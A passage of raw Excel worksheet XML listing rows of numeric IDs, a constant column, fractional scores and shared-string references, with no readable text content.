        <v>7991</v>
      </c>
    </row>
    <row r="4042" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4042" s="1">
        <v>4040</v>
      </c>
      <c r="B4042">
        <v>1802</v>
      </c>
      <c r="C4042">
        <v>1802</v>
      </c>
      <c r="D4042">
        <v>2</v>
      </c>
      <c r="E4042">
        <v>0.98079997301101685</v>
      </c>
      <c r="F4042" t="s">
        <v>5592</v>
      </c>
      <c r="G4042" t="s">
        <v>7992</v>
      </c>
      <c r="H4042" t="s">
        <v>7993</v>
      </c>
    </row>
    <row r="4043" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4043" s="1">
        <v>4041</v>
      </c>
      <c r="B4043">
        <v>7112</v>
      </c>
      <c r="C4043">
        <v>7112</v>
      </c>
      <c r="D4043">
        <v>2</v>
      </c>
      <c r="E4043">
        <v>0.55400002002716064</v>
      </c>
      <c r="F4043" t="s">
        <v>5592</v>
      </c>
      <c r="G4043" t="s">
        <v>7994</v>
      </c>
      <c r="H4043" t="s">
        <v>7995</v>
      </c>
    </row>
    <row r="4044" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4044" s="1">
        <v>4042</v>
      </c>
      <c r="B4044">
        <v>1805</v>
      </c>
      <c r="C4044">
        <v>1805</v>
      </c>
      <c r="D4044">
        <v>2</v>
      </c>
      <c r="E4044">
        <v>0.50419998168945313</v>
      </c>
      <c r="F4044" t="s">
        <v>5592</v>
      </c>
      <c r="G4044" t="s">
        <v>7996</v>
      </c>
      <c r="H4044" t="s">
        <v>7997</v>
      </c>
    </row>
    <row r="4045" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4045" s="1">
        <v>4043</v>
      </c>
      <c r="B4045">
        <v>7124</v>
      </c>
      <c r="C4045">
        <v>7124</v>
      </c>
      <c r="D4045">
        <v>2</v>
      </c>
      <c r="E4045">
        <v>0.517799973487854</v>
      </c>
      <c r="F4045" t="s">
        <v>5592</v>
      </c>
      <c r="G4045" t="s">
        <v>7998</v>
      </c>
      <c r="H4045" t="s">
        <v>7999</v>
      </c>
    </row>
    <row r="4046" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4046" s="1">
        <v>4044</v>
      </c>
      <c r="B4046">
        <v>1809</v>
      </c>
      <c r="C4046">
        <v>1809</v>
      </c>
      <c r="D4046">
        <v>2</v>
      </c>
      <c r="E4046">
        <v>0.83099997043609619</v>
      </c>
      <c r="F4046" t="s">
        <v>5592</v>
      </c>
      <c r="G4046" t="s">
        <v>8000</v>
      </c>
      <c r="H4046" t="s">
        <v>8001</v>
      </c>
    </row>
    <row r="4047" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4047" s="1">
        <v>4045</v>
      </c>
      <c r="B4047">
        <v>7149</v>
      </c>
      <c r="C4047">
        <v>7149</v>
      </c>
      <c r="D4047">
        <v>2</v>
      </c>
      <c r="E4047">
        <v>0.99599999189376831</v>
      </c>
      <c r="F4047" t="s">
        <v>5592</v>
      </c>
      <c r="G4047" t="s">
        <v>8002</v>
      </c>
      <c r="H4047" t="s">
        <v>8003</v>
      </c>
    </row>
    <row r="4048" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4048" s="1">
        <v>4046</v>
      </c>
      <c r="B4048">
        <v>1675</v>
      </c>
      <c r="C4048">
        <v>1675</v>
      </c>
      <c r="D4048">
        <v>2</v>
      </c>
      <c r="E4048">
        <v>0.99800002574920654</v>
      </c>
      <c r="F4048" t="s">
        <v>5592</v>
      </c>
      <c r="G4048" t="s">
        <v>8004</v>
      </c>
      <c r="H4048" t="s">
        <v>8005</v>
      </c>
    </row>
    <row r="4049" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4049" s="1">
        <v>4047</v>
      </c>
      <c r="B4049">
        <v>7185</v>
      </c>
      <c r="C4049">
        <v>7185</v>
      </c>
      <c r="D4049">
        <v>2</v>
      </c>
      <c r="E4049">
        <v>0.79640001058578491</v>
      </c>
      <c r="F4049" t="s">
        <v>5592</v>
      </c>
      <c r="G4049" t="s">
        <v>8006</v>
      </c>
      <c r="H4049" t="s">
        <v>8007</v>
      </c>
    </row>
    <row r="4050" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4050" s="1">
        <v>4048</v>
      </c>
      <c r="B4050">
        <v>7184</v>
      </c>
      <c r="C4050">
        <v>7184</v>
      </c>
      <c r="D4050">
        <v>2</v>
      </c>
      <c r="E4050">
        <v>0.62860000133514404</v>
      </c>
      <c r="F4050" t="s">
        <v>5592</v>
      </c>
      <c r="G4050" t="s">
        <v>8008</v>
      </c>
      <c r="H4050" t="s">
        <v>8009</v>
      </c>
    </row>
    <row r="4051" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4051" s="1">
        <v>4049</v>
      </c>
      <c r="B4051">
        <v>7183</v>
      </c>
      <c r="C4051">
        <v>7183</v>
      </c>
      <c r="D4051">
        <v>2</v>
      </c>
      <c r="E4051">
        <v>0.98119997978210449</v>
      </c>
      <c r="F4051" t="s">
        <v>5592</v>
      </c>
      <c r="G4051" t="s">
        <v>8010</v>
      </c>
      <c r="H4051" t="s">
        <v>8011</v>
      </c>
    </row>
    <row r="4052" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4052" s="1">
        <v>4050</v>
      </c>
      <c r="B4052">
        <v>1628</v>
      </c>
      <c r="C4052">
        <v>1628</v>
      </c>
      <c r="D4052">
        <v>2</v>
      </c>
      <c r="E4052">
        <v>0.55839997529983521</v>
      </c>
      <c r="F4052" t="s">
        <v>5592</v>
      </c>
      <c r="G4052" t="s">
        <v>8012</v>
      </c>
      <c r="H4052" t="s">
        <v>8013</v>
      </c>
    </row>
    <row r="4053" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4053" s="1">
        <v>4051</v>
      </c>
      <c r="B4053">
        <v>1632</v>
      </c>
      <c r="C4053">
        <v>1632</v>
      </c>
      <c r="D4053">
        <v>2</v>
      </c>
      <c r="E4053">
        <v>0.7620999813079834</v>
      </c>
      <c r="F4053" t="s">
        <v>5592</v>
      </c>
      <c r="G4053" t="s">
        <v>8014</v>
      </c>
      <c r="H4053" t="s">
        <v>8015</v>
      </c>
    </row>
    <row r="4054" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4054" s="1">
        <v>4052</v>
      </c>
      <c r="B4054">
        <v>1633</v>
      </c>
      <c r="C4054">
        <v>1633</v>
      </c>
      <c r="D4054">
        <v>2</v>
      </c>
      <c r="E4054">
        <v>0.991100013256073</v>
      </c>
      <c r="F4054" t="s">
        <v>5592</v>
      </c>
      <c r="G4054" t="s">
        <v>8016</v>
      </c>
      <c r="H4054" t="s">
        <v>8017</v>
      </c>
    </row>
    <row r="4055" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4055" s="1">
        <v>4053</v>
      </c>
      <c r="B4055">
        <v>1637</v>
      </c>
      <c r="C4055">
        <v>1637</v>
      </c>
      <c r="D4055">
        <v>2</v>
      </c>
      <c r="E4055">
        <v>0.45019999146461492</v>
      </c>
      <c r="F4055" t="s">
        <v>5592</v>
      </c>
      <c r="G4055" t="s">
        <v>8018</v>
      </c>
      <c r="H4055" t="s">
        <v>8019</v>
      </c>
    </row>
    <row r="4056" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4056" s="1">
        <v>4054</v>
      </c>
      <c r="B4056">
        <v>1641</v>
      </c>
      <c r="C4056">
        <v>1641</v>
      </c>
      <c r="D4056">
        <v>2</v>
      </c>
      <c r="E4056">
        <v>0.60250002145767212</v>
      </c>
      <c r="F4056" t="s">
        <v>5592</v>
      </c>
      <c r="G4056" t="s">
        <v>8020</v>
      </c>
      <c r="H4056" t="s">
        <v>8021</v>
      </c>
    </row>
    <row r="4057" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4057" s="1">
        <v>4055</v>
      </c>
      <c r="B4057">
        <v>1643</v>
      </c>
      <c r="C4057">
        <v>1643</v>
      </c>
      <c r="D4057">
        <v>2</v>
      </c>
      <c r="E4057">
        <v>0.631600022315979</v>
      </c>
      <c r="F4057" t="s">
        <v>5592</v>
      </c>
      <c r="G4057" t="s">
        <v>8022</v>
      </c>
      <c r="H4057" t="s">
        <v>8023</v>
      </c>
    </row>
    <row r="4058" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4058" s="1">
        <v>4056</v>
      </c>
      <c r="B4058">
        <v>1644</v>
      </c>
      <c r="C4058">
        <v>1644</v>
      </c>
      <c r="D4058">
        <v>2</v>
      </c>
      <c r="E4058">
        <v>0.53060001134872437</v>
      </c>
      <c r="F4058" t="s">
        <v>5592</v>
      </c>
      <c r="G4058" t="s">
        <v>8024</v>
      </c>
      <c r="H4058" t="s">
        <v>8025</v>
      </c>
    </row>
    <row r="4059" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4059" s="1">
        <v>4057</v>
      </c>
      <c r="B4059">
        <v>7150</v>
      </c>
      <c r="C4059">
        <v>7150</v>
      </c>
      <c r="D4059">
        <v>2</v>
      </c>
      <c r="E4059">
        <v>0.99870002269744873</v>
      </c>
      <c r="F4059" t="s">
        <v>5592</v>
      </c>
      <c r="G4059" t="s">
        <v>8026</v>
      </c>
      <c r="H4059" t="s">
        <v>8027</v>
      </c>
    </row>
    <row r="4060" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4060" s="1">
        <v>4058</v>
      </c>
      <c r="B4060">
        <v>1648</v>
      </c>
      <c r="C4060">
        <v>1648</v>
      </c>
      <c r="D4060">
        <v>2</v>
      </c>
      <c r="E4060">
        <v>0.73940002918243408</v>
      </c>
      <c r="F4060" t="s">
        <v>5592</v>
      </c>
      <c r="G4060" t="s">
        <v>8028</v>
      </c>
      <c r="H4060" t="s">
        <v>8029</v>
      </c>
    </row>
    <row r="4061" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4061" s="1">
        <v>4059</v>
      </c>
      <c r="B4061">
        <v>7169</v>
      </c>
      <c r="C4061">
        <v>7169</v>
      </c>
      <c r="D4061">
        <v>2</v>
      </c>
      <c r="E4061">
        <v>0.98030000925064087</v>
      </c>
      <c r="F4061" t="s">
        <v>5592</v>
      </c>
      <c r="G4061" t="s">
        <v>8030</v>
      </c>
      <c r="H4061" t="s">
        <v>8031</v>
      </c>
    </row>
    <row r="4062" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4062" s="1">
        <v>4060</v>
      </c>
      <c r="B4062">
        <v>7166</v>
      </c>
      <c r="C4062">
        <v>7166</v>
      </c>
      <c r="D4062">
        <v>2</v>
      </c>
      <c r="E4062">
        <v>0.62080001831054688</v>
      </c>
      <c r="F4062" t="s">
        <v>5592</v>
      </c>
      <c r="G4062" t="s">
        <v>8032</v>
      </c>
      <c r="H4062" t="s">
        <v>5743</v>
      </c>
    </row>
    <row r="4063" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4063" s="1">
        <v>4061</v>
      </c>
      <c r="B4063">
        <v>7164</v>
      </c>
      <c r="C4063">
        <v>7164</v>
      </c>
      <c r="D4063">
        <v>2</v>
      </c>
      <c r="E4063">
        <v>0.97699999809265137</v>
      </c>
      <c r="F4063" t="s">
        <v>5592</v>
      </c>
      <c r="G4063" t="s">
        <v>8033</v>
      </c>
      <c r="H4063" t="s">
        <v>8034</v>
      </c>
    </row>
    <row r="4064" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4064" s="1">
        <v>4062</v>
      </c>
      <c r="B4064">
        <v>7163</v>
      </c>
      <c r="C4064">
        <v>7163</v>
      </c>
      <c r="D4064">
        <v>2</v>
      </c>
      <c r="E4064">
        <v>0.99739998579025269</v>
      </c>
      <c r="F4064" t="s">
        <v>5592</v>
      </c>
      <c r="G4064" t="s">
        <v>8035</v>
      </c>
      <c r="H4064" t="s">
        <v>8036</v>
      </c>
    </row>
    <row r="4065" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4065" s="1">
        <v>4063</v>
      </c>
      <c r="B4065">
        <v>1662</v>
      </c>
      <c r="C4065">
        <v>1662</v>
      </c>
      <c r="D4065">
        <v>2</v>
      </c>
      <c r="E4065">
        <v>0.99610000848770142</v>
      </c>
      <c r="F4065" t="s">
        <v>5592</v>
      </c>
      <c r="G4065" t="s">
        <v>8037</v>
      </c>
      <c r="H4065" t="s">
        <v>8038</v>
      </c>
    </row>
    <row r="4066" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4066" s="1">
        <v>4064</v>
      </c>
      <c r="B4066">
        <v>7159</v>
      </c>
      <c r="C4066">
        <v>7159</v>
      </c>
      <c r="D4066">
        <v>2</v>
      </c>
      <c r="E4066">
        <v>0.99839997291564941</v>
      </c>
      <c r="F4066" t="s">
        <v>5592</v>
      </c>
      <c r="G4066" t="s">
        <v>8039</v>
      </c>
      <c r="H4066" t="s">
        <v>8040</v>
      </c>
    </row>
    <row r="4067" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4067" s="1">
        <v>4065</v>
      </c>
      <c r="B4067">
        <v>7156</v>
      </c>
      <c r="C4067">
        <v>7156</v>
      </c>
      <c r="D4067">
        <v>2</v>
      </c>
      <c r="E4067">
        <v>0.58899998664855957</v>
      </c>
      <c r="F4067" t="s">
        <v>5592</v>
      </c>
      <c r="G4067" t="s">
        <v>8041</v>
      </c>
      <c r="H4067" t="s">
        <v>8042</v>
      </c>
    </row>
    <row r="4068" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4068" s="1">
        <v>4066</v>
      </c>
      <c r="B4068">
        <v>1670</v>
      </c>
      <c r="C4068">
        <v>1670</v>
      </c>
      <c r="D4068">
        <v>2</v>
      </c>
      <c r="E4068">
        <v>0.97009998559951782</v>
      </c>
      <c r="F4068" t="s">
        <v>5592</v>
      </c>
      <c r="G4068" t="s">
        <v>8043</v>
      </c>
      <c r="H4068" t="s">
        <v>8044</v>
      </c>
    </row>
    <row r="4069" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4069" s="1">
        <v>4067</v>
      </c>
      <c r="B4069">
        <v>1671</v>
      </c>
      <c r="C4069">
        <v>1671</v>
      </c>
      <c r="D4069">
        <v>2</v>
      </c>
      <c r="E4069">
        <v>0.87629997730255127</v>
      </c>
      <c r="F4069" t="s">
        <v>5592</v>
      </c>
      <c r="G4069" t="s">
        <v>8045</v>
      </c>
      <c r="H4069" t="s">
        <v>8046</v>
      </c>
    </row>
    <row r="4070" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4070" s="1">
        <v>4068</v>
      </c>
      <c r="B4070">
        <v>7153</v>
      </c>
      <c r="C4070">
        <v>7153</v>
      </c>
      <c r="D4070">
        <v>2</v>
      </c>
      <c r="E4070">
        <v>0.42140001058578491</v>
      </c>
      <c r="F4070" t="s">
        <v>5592</v>
      </c>
      <c r="G4070" t="s">
        <v>8047</v>
      </c>
      <c r="H4070" t="s">
        <v>8048</v>
      </c>
    </row>
    <row r="4071" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4071" s="1">
        <v>4069</v>
      </c>
      <c r="B4071">
        <v>1654</v>
      </c>
      <c r="C4071">
        <v>1654</v>
      </c>
      <c r="D4071">
        <v>2</v>
      </c>
      <c r="E4071">
        <v>0.99419999122619629</v>
      </c>
      <c r="F4071" t="s">
        <v>5592</v>
      </c>
      <c r="G4071" t="s">
        <v>8049</v>
      </c>
      <c r="H4071" t="s">
        <v>8050</v>
      </c>
    </row>
    <row r="4072" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4072" s="1">
        <v>4070</v>
      </c>
      <c r="B4072">
        <v>989</v>
      </c>
      <c r="C4072">
        <v>989</v>
      </c>
      <c r="D4072">
        <v>2</v>
      </c>
      <c r="E4072">
        <v>0.97829997539520264</v>
      </c>
      <c r="F4072" t="s">
        <v>5592</v>
      </c>
      <c r="G4072" t="s">
        <v>8051</v>
      </c>
      <c r="H4072" t="s">
        <v>8052</v>
      </c>
    </row>
    <row r="4073" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4073" s="1">
        <v>4071</v>
      </c>
      <c r="B4073">
        <v>7465</v>
      </c>
      <c r="C4073">
        <v>7465</v>
      </c>
      <c r="D4073">
        <v>2</v>
      </c>
      <c r="E4073">
        <v>0.51690000295639038</v>
      </c>
      <c r="F4073" t="s">
        <v>5592</v>
      </c>
      <c r="G4073" t="s">
        <v>8053</v>
      </c>
      <c r="H4073" t="s">
        <v>8054</v>
      </c>
    </row>
    <row r="4074" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4074" s="1">
        <v>4072</v>
      </c>
      <c r="B4074">
        <v>7473</v>
      </c>
      <c r="C4074">
        <v>7473</v>
      </c>
      <c r="D4074">
        <v>2</v>
      </c>
      <c r="E4074">
        <v>0.99900001287460327</v>
      </c>
      <c r="F4074" t="s">
        <v>5592</v>
      </c>
      <c r="G4074" t="s">
        <v>8055</v>
      </c>
      <c r="H4074" t="s">
        <v>8056</v>
      </c>
    </row>
    <row r="4075" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4075" s="1">
        <v>4073</v>
      </c>
      <c r="B4075">
        <v>7759</v>
      </c>
      <c r="C4075">
        <v>7759</v>
      </c>
      <c r="D4075">
        <v>2</v>
      </c>
      <c r="E4075">
        <v>0.99910002946853638</v>
      </c>
      <c r="F4075" t="s">
        <v>5592</v>
      </c>
      <c r="G4075" t="s">
        <v>8057</v>
      </c>
      <c r="H4075" t="s">
        <v>8058</v>
      </c>
    </row>
    <row r="4076" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4076" s="1">
        <v>4074</v>
      </c>
      <c r="B4076">
        <v>7758</v>
      </c>
      <c r="C4076">
        <v>7758</v>
      </c>
      <c r="D4076">
        <v>2</v>
      </c>
      <c r="E4076">
        <v>0.99870002269744873</v>
      </c>
      <c r="F4076" t="s">
        <v>5592</v>
      </c>
      <c r="G4076" t="s">
        <v>8059</v>
      </c>
      <c r="H4076" t="s">
        <v>8060</v>
      </c>
    </row>
    <row r="4077" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4077" s="1">
        <v>4075</v>
      </c>
      <c r="B4077">
        <v>366</v>
      </c>
      <c r="C4077">
        <v>366</v>
      </c>
      <c r="D4077">
        <v>2</v>
      </c>
      <c r="E4077">
        <v>0.63870000839233398</v>
      </c>
      <c r="F4077" t="s">
        <v>5592</v>
      </c>
      <c r="G4077" t="s">
        <v>8061</v>
      </c>
      <c r="H4077" t="s">
        <v>8062</v>
      </c>
    </row>
    <row r="4078" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4078" s="1">
        <v>4076</v>
      </c>
      <c r="B4078">
        <v>367</v>
      </c>
      <c r="C4078">
        <v>367</v>
      </c>
      <c r="D4078">
        <v>2</v>
      </c>
      <c r="E4078">
        <v>0.74470001459121704</v>
      </c>
      <c r="F4078" t="s">
        <v>5592</v>
      </c>
      <c r="G4078" t="s">
        <v>8063</v>
      </c>
      <c r="H4078" t="s">
        <v>8064</v>
      </c>
    </row>
    <row r="4079" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4079" s="1">
        <v>4077</v>
      </c>
      <c r="B4079">
        <v>7753</v>
      </c>
      <c r="C4079">
        <v>7753</v>
      </c>
      <c r="D4079">
        <v>2</v>
      </c>
      <c r="E4079">
        <v>0.86299997568130493</v>
      </c>
      <c r="F4079" t="s">
        <v>5592</v>
      </c>
      <c r="G4079" t="s">
        <v>8065</v>
      </c>
      <c r="H4079" t="s">
        <v>8066</v>
      </c>
    </row>
    <row r="4080" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4080" s="1">
        <v>4078</v>
      </c>
      <c r="B4080">
        <v>373</v>
      </c>
      <c r="C4080">
        <v>373</v>
      </c>
      <c r="D4080">
        <v>2</v>
      </c>
      <c r="E4080">
        <v>0.99119997024536133</v>
      </c>
      <c r="F4080" t="s">
        <v>5592</v>
      </c>
      <c r="G4080" t="s">
        <v>8067</v>
      </c>
      <c r="H4080" t="s">
        <v>8068</v>
      </c>
    </row>
    <row r="4081" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4081" s="1">
        <v>4079</v>
      </c>
      <c r="B4081">
        <v>376</v>
      </c>
      <c r="C4081">
        <v>376</v>
      </c>
      <c r="D4081">
        <v>2</v>
      </c>
      <c r="E4081">
        <v>0.97060000896453857</v>
      </c>
      <c r="F4081" t="s">
        <v>5592</v>
      </c>
      <c r="G4081" t="s">
        <v>8069</v>
      </c>
      <c r="H4081" t="s">
        <v>8070</v>
      </c>
    </row>
    <row r="4082" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4082" s="1">
        <v>4080</v>
      </c>
      <c r="B4082">
        <v>377</v>
      </c>
      <c r="C4082">
        <v>377</v>
      </c>
      <c r="D4082">
        <v>2</v>
      </c>
      <c r="E4082">
        <v>0.6654999852180481</v>
      </c>
      <c r="F4082" t="s">
        <v>5592</v>
      </c>
      <c r="G4082" t="s">
        <v>8071</v>
      </c>
      <c r="H4082" t="s">
        <v>8072</v>
      </c>
    </row>
    <row r="4083" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4083" s="1">
        <v>4081</v>
      </c>
      <c r="B4083">
        <v>7749</v>
      </c>
      <c r="C4083">
        <v>7749</v>
      </c>
      <c r="D4083">
        <v>2</v>
      </c>
      <c r="E4083">
        <v>0.99800002574920654</v>
      </c>
      <c r="F4083" t="s">
        <v>5592</v>
      </c>
      <c r="G4083" t="s">
        <v>8073</v>
      </c>
      <c r="H4083" t="s">
        <v>8074</v>
      </c>
    </row>
    <row r="4084" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4084" s="1">
        <v>4082</v>
      </c>
      <c r="B4084">
        <v>7748</v>
      </c>
      <c r="C4084">
        <v>7748</v>
      </c>
      <c r="D4084">
        <v>2</v>
      </c>
      <c r="E4084">
        <v>0.60490000247955322</v>
      </c>
      <c r="F4084" t="s">
        <v>5592</v>
      </c>
      <c r="G4084" t="s">
        <v>8075</v>
      </c>
      <c r="H4084" t="s">
        <v>8076</v>
      </c>
    </row>
    <row r="4085" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4085" s="1">
        <v>4083</v>
      </c>
      <c r="B4085">
        <v>383</v>
      </c>
      <c r="C4085">
        <v>383</v>
      </c>
      <c r="D4085">
        <v>2</v>
      </c>
      <c r="E4085">
        <v>0.80220001935958862</v>
      </c>
      <c r="F4085" t="s">
        <v>5592</v>
      </c>
      <c r="G4085" t="s">
        <v>8077</v>
      </c>
      <c r="H4085" t="s">
        <v>8078</v>
      </c>
    </row>
    <row r="4086" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4086" s="1">
        <v>4084</v>
      </c>
      <c r="B4086">
        <v>384</v>
      </c>
      <c r="C4086">
        <v>384</v>
      </c>
      <c r="D4086">
        <v>2</v>
      </c>
      <c r="E4086">
        <v>0.99900001287460327</v>
      </c>
      <c r="F4086" t="s">
        <v>5592</v>
      </c>
      <c r="G4086" t="s">
        <v>8079</v>
      </c>
      <c r="H4086" t="s">
        <v>8080</v>
      </c>
    </row>
    <row r="4087" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4087" s="1">
        <v>4085</v>
      </c>
      <c r="B4087">
        <v>388</v>
      </c>
      <c r="C4087">
        <v>388</v>
      </c>
      <c r="D4087">
        <v>2</v>
      </c>
      <c r="E4087">
        <v>0.53119999170303345</v>
      </c>
      <c r="F4087" t="s">
        <v>5592</v>
      </c>
      <c r="G4087" t="s">
        <v>8081</v>
      </c>
      <c r="H4087" t="s">
        <v>8082</v>
      </c>
    </row>
    <row r="4088" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4088" s="1">
        <v>4086</v>
      </c>
      <c r="B4088">
        <v>390</v>
      </c>
      <c r="C4088">
        <v>390</v>
      </c>
      <c r="D4088">
        <v>2</v>
      </c>
      <c r="E4088">
        <v>0.99819999933242798</v>
      </c>
      <c r="F4088" t="s">
        <v>5592</v>
      </c>
      <c r="G4088" t="s">
        <v>8083</v>
      </c>
      <c r="H4088" t="s">
        <v>8084</v>
      </c>
    </row>
    <row r="4089" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4089" s="1">
        <v>4087</v>
      </c>
      <c r="B4089">
        <v>391</v>
      </c>
      <c r="C4089">
        <v>391</v>
      </c>
      <c r="D4089">
        <v>2</v>
      </c>
      <c r="E4089">
        <v>0.50830000638961792</v>
      </c>
      <c r="F4089" t="s">
        <v>5592</v>
      </c>
      <c r="G4089" t="s">
        <v>8085</v>
      </c>
      <c r="H4089" t="s">
        <v>8086</v>
      </c>
    </row>
    <row r="4090" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4090" s="1">
        <v>4088</v>
      </c>
      <c r="B4090">
        <v>392</v>
      </c>
      <c r="C4090">
        <v>392</v>
      </c>
      <c r="D4090">
        <v>2</v>
      </c>
      <c r="E4090">
        <v>0.99790000915527344</v>
      </c>
      <c r="F4090" t="s">
        <v>5592</v>
      </c>
      <c r="G4090" t="s">
        <v>8087</v>
      </c>
      <c r="H4090" t="s">
        <v>8088</v>
      </c>
    </row>
    <row r="4091" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4091" s="1">
        <v>4089</v>
      </c>
      <c r="B4091">
        <v>7747</v>
      </c>
      <c r="C4091">
        <v>7747</v>
      </c>
      <c r="D4091">
        <v>2</v>
      </c>
      <c r="E4091">
        <v>0.99180001020431519</v>
      </c>
      <c r="F4091" t="s">
        <v>5592</v>
      </c>
      <c r="G4091" t="s">
        <v>8089</v>
      </c>
      <c r="H4091" t="s">
        <v>8090</v>
      </c>
    </row>
    <row r="4092" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4092" s="1">
        <v>4090</v>
      </c>
      <c r="B4092">
        <v>7746</v>
      </c>
      <c r="C4092">
        <v>7746</v>
      </c>
      <c r="D4092">
        <v>2</v>
      </c>
      <c r="E4092">
        <v>0.99949997663497925</v>
      </c>
      <c r="F4092" t="s">
        <v>5592</v>
      </c>
      <c r="G4092" t="s">
        <v>8091</v>
      </c>
      <c r="H4092" t="s">
        <v>8092</v>
      </c>
    </row>
    <row r="4093" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4093" s="1">
        <v>4091</v>
      </c>
      <c r="B4093">
        <v>396</v>
      </c>
      <c r="C4093">
        <v>396</v>
      </c>
      <c r="D4093">
        <v>2</v>
      </c>
      <c r="E4093">
        <v>0.99739998579025269</v>
      </c>
      <c r="F4093" t="s">
        <v>5592</v>
      </c>
      <c r="G4093" t="s">
        <v>8093</v>
      </c>
      <c r="H4093" t="s">
        <v>8094</v>
      </c>
    </row>
    <row r="4094" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4094" s="1">
        <v>4092</v>
      </c>
      <c r="B4094">
        <v>7745</v>
      </c>
      <c r="C4094">
        <v>7745</v>
      </c>
      <c r="D4094">
        <v>2</v>
      </c>
      <c r="E4094">
        <v>0.82740002870559692</v>
      </c>
      <c r="F4094" t="s">
        <v>5592</v>
      </c>
      <c r="G4094" t="s">
        <v>8095</v>
      </c>
      <c r="H4094" t="s">
        <v>8096</v>
      </c>
    </row>
    <row r="4095" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4095" s="1">
        <v>4093</v>
      </c>
      <c r="B4095">
        <v>7744</v>
      </c>
      <c r="C4095">
        <v>7744</v>
      </c>
      <c r="D4095">
        <v>2</v>
      </c>
      <c r="E4095">
        <v>0.99910002946853638</v>
      </c>
      <c r="F4095" t="s">
        <v>5592</v>
      </c>
      <c r="G4095" t="s">
        <v>8097</v>
      </c>
      <c r="H4095" t="s">
        <v>8098</v>
      </c>
    </row>
    <row r="4096" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4096" s="1">
        <v>4094</v>
      </c>
      <c r="B4096">
        <v>357</v>
      </c>
      <c r="C4096">
        <v>357</v>
      </c>
      <c r="D4096">
        <v>2</v>
      </c>
      <c r="E4096">
        <v>0.62470000982284546</v>
      </c>
      <c r="F4096" t="s">
        <v>5592</v>
      </c>
      <c r="G4096" t="s">
        <v>8099</v>
      </c>
      <c r="H4096" t="s">
        <v>7351</v>
      </c>
    </row>
    <row r="4097" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4097" s="1">
        <v>4095</v>
      </c>
      <c r="B4097">
        <v>355</v>
      </c>
      <c r="C4097">
        <v>355</v>
      </c>
      <c r="D4097">
        <v>2</v>
      </c>
      <c r="E4097">
        <v>0.99739998579025269</v>
      </c>
      <c r="F4097" t="s">
        <v>5592</v>
      </c>
      <c r="G4097" t="s">
        <v>8100</v>
      </c>
      <c r="H4097" t="s">
        <v>8101</v>
      </c>
    </row>
    <row r="4098" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4098" s="1">
        <v>4096</v>
      </c>
      <c r="B4098">
        <v>352</v>
      </c>
      <c r="C4098">
        <v>352</v>
      </c>
      <c r="D4098">
        <v>2</v>
      </c>
      <c r="E4098">
        <v>0.64499998092651367</v>
      </c>
      <c r="F4098" t="s">
        <v>5592</v>
      </c>
      <c r="G4098" t="s">
        <v>8102</v>
      </c>
      <c r="H4098" t="s">
        <v>8103</v>
      </c>
    </row>
    <row r="4099" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4099" s="1">
        <v>4097</v>
      </c>
      <c r="B4099">
        <v>7764</v>
      </c>
      <c r="C4099">
        <v>7764</v>
      </c>
      <c r="D4099">
        <v>2</v>
      </c>
      <c r="E4099">
        <v>0.99709999561309814</v>
      </c>
      <c r="F4099" t="s">
        <v>5592</v>
      </c>
      <c r="G4099" t="s">
        <v>8104</v>
      </c>
      <c r="H4099" t="s">
        <v>8105</v>
      </c>
    </row>
    <row r="4100" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4100" s="1">
        <v>4098</v>
      </c>
      <c r="B4100">
        <v>7806</v>
      </c>
      <c r="C4100">
        <v>7806</v>
